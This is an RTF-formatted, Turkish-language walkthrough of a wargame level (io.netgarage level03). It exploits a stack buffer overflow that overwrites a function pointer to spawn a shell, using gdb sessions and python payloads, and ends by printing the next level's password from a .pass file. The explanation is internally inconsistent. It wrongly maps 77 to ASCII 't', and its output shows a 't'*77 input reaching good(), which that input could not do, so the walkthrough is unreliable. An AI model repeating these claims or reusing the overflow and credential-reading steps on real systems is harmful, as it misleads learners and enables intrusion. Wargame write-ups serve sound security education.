{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 .SFNSMono-Heavy;\f1\fnil\fcharset0 .SFNSMono-Regular;\f2\fswiss\fcharset0 Helvetica-Bold;
\f3\fnil\fcharset0 .SFNSMono-Semibold;\f4\fnil\fcharset0 Menlo-Bold;\f5\fnil\fcharset0 .SFNSMono-Bold;
\f6\fnil\fcharset0 Menlo-Regular;}
{\colortbl;\red255\green255\blue255;\red27\green31\blue35;\red255\green255\blue255;\red0\green0\blue0;
}
{\*\expandedcolortbl;;\cssrgb\c14118\c16078\c18431;\cssrgb\c100000\c100000\c100000;\cssrgb\c0\c0\c0;
}
\margl1440\margr1440\vieww20220\viewh17280\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\b\fs24 \cf0 Netgarage Level03
\f1\b0 \
\

\fs28 level3@io:~$ cd /levels && ls\
\

\f2\b Source kodun oldu\uc0\u287 unu g\'f6r\'fcyoruz.\

\f1\b0 \
level3@io:~$ cat level03.c\
\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\fs32 \cf0 //bla, based on work by beach\
\
#include <stdio.h>\
#include <string.h>\
\
void good()\
\{\
        puts("Win.");\
        execl("/bin/sh", "sh", NULL);\
\}\
void bad()\
\{\
        printf("I'm so sorry, you're at %p and you want to be at %p\\n", bad, good);\
\}\
\
int main(int argc, char **argv, char **envp)\
\{\
        void (*functionpointer)(void) = bad;\
        char buffer[50];\
\
        if(argc != 2 || strlen(argv[1]) < 4)\
                return 0;\
\
        memcpy(buffer, argv[1], strlen(argv[1]));\
        memset(buffer, 0, strlen(argv[1]) - 4);\
\
        printf("This is exciting we're going to %p\\n", functionpointer);\
        functionpointer();\
\
        return 0;\
\}\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\fs28 \cf0 \
\
Bunu da Assembly yoluyla \'e7\'f6z\'fcyoruz. Koda bakt\uc0\u305 \u287 \u305 m\u305 zda buffer\'92imiz en fazla 50 alabiliyor. Stack overflow\'92\u305  a\u351 mam\u305 z laz\u305 m ki program\u305  \'e7\'f6zebilelim. Hadi  o zaman i\u351 leme koyulal\u305 m :)\
\
\
level3@io:~$ gdb level03\
\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f3\b \cf0 (gdb) break main
\f1\b0 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f4\b \cf2 \cb3 \expnd0\expndtw0\kerning0
\
Breakpoint 1 at 0x80484ce\

\f1\b0 \

\fs32 \
\'97\'97> \uc0\u350 imdi 50 char\u305  ge\'e7me vakti\

\fs28 \

\f3\b (gdb) run
\f1\b0  
\f3\b \cf4 \cb1 $(python -c 'print "A"*80')
\f1\b0 \cf2 \cb3 \

\f4\b \
Starting program: /levels/level03 "deneme"\
\
Breakpoint 1, 0x080484ce in main ()\
\

\f1\b0\fs32 \'97\'97> Esp kayd\uc0\u305  olu\u351 turmad\u305 ysa n diyip ge\'e7ebilirsiniz.
\f4\b\fs28 \
\

\f3 (gdb) n\
\

\f4 Single stepping until exit from function main,\
which has no line number information.\
This is exciting we're going to 0x80484a4\
I'm so sorry, you're at 0x80484a4 and you want to be at 0x8048474\
0xb7e26286 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
\f1\b0 \
\

\fs32 \'97\'97> \uc0\u350 imdi ESP kayd\u305  ile stack\'92in i\'e7eri\u287 ini g\'f6rece\u287 iz.\
\

\f3\b\fs28 (gdb) x/32 $esp
\f1\b0\fs32 \

\fs28 \

\f5\b 0xbffffb90:	-1207963648	-1207961312	-1073742928	134513268\
0xbffffba0:	0	-1073742780	-1208213504	5\
0xbffffbb0:	24641422	-1208213504	-1209946600	-1208135104\
0xbffffbc0:	-1208213504	134518728	-1073742888	134513464\
0xbffffbd0:	-1	134518728	-1073742840	134514089\
0xbffffbe0:	2	-1208213504	0	-1209808325\
0xbffffbf0:	-1208212516	134513076	134514075	0\
0xbffffc00:	2	-1208213504	0	-1209900410\

\f1\b0 \
\'97\'97> Ekran\uc0\u305 n\u305 z b\'f6yle g\'f6sterebilir. Enterlad\u305 \u287 \u305 n\u305 zda bir sonrakini adresler \'fczerinde g\'f6sterecektir.\
\

\f3\b (gdb) cont\
\

\f4 Continuing.\
This is exciting we're going to 0x41414141\
\
Program received signal SIGSEGV, Segmentation fault.\
0x41414141 in ?? ()\
\

\f1\b0 \
\'97\'97> Bu sefer arg\'fcmanda verdi\uc0\u287 imiz 80 say\u305 s\u305 n\u305  1 er 1 er azaltarak devam edelim. En son 77\'92 de 
\f5\b SIGSEGV
\f1\b0  yiyece\uc0\u287 iz. Ve 
\f5\b frame_dummy ()
\f1\b0  yaz\uc0\u305 s\u305 n\u305  g\'f6sterecektir. Do\u287 ru say\u305 y\u305  verdi\u287 imize \u351 imdi emin olduk. 77 
\f5\b ASCII
\f1\b0  tablosundaki kar\uc0\u351 \u305 l\u305 \u287 \u305  
\f5\b \'92t\'92
\f1\b0  olarak g\'f6r\'fcyoruz. Arg\'fcmana yazal\uc0\u305 m \'e7\u305 kt\u305 s\u305  ne olacak?\
\

\f3\b (gdb) run
\f1\b0  
\f3\b \cf4 \cb1 $(python -c 'print \'93t\'9477\'92)\cf2 \cb3 \
\

\f5 The program being debugged has been started already.\
Start it from the beginning? (y or n) y\
Starting program: /levels/level03 $(python -c 'print "t"*77')\
\
Breakpoint 1, 0x080484ce in main ()\
\

\f3 (gdb) c
\f1\b0 \
\
Continuing.\
This is exciting we're going to 0x8048474\
Win.\
process 28015 is executing new program: /bin/bash\
\
Breakpoint 1, 0x08061861 in main ()\
\

\f6 \'97\'97> Evet program\uc0\u305  ba\u351 ar\u305 yla \'e7\'f6zm\'fc\u351  bulunmaktay\u305 z. Gdb\'92den \'e7\u305 k\u305 p normal arg\'fcman verelim ki bir sonraki kullan\u305 c\u305 ya eri\u351 elim.\

\f1 \
Level04 kullan\uc0\u305 c\u305 n\u305 n \u351 ifre:\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f3\b \cf0 \cb1 \kerning1\expnd0\expndtw0 level3@io:~$ cat /home/level4/.pass
\f1\b0 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf2 \cb3 \expnd0\expndtw0\kerning0
7WhHa5HWMNRAYl9T\cf0 \cb1 \kerning1\expnd0\expndtw0 \
}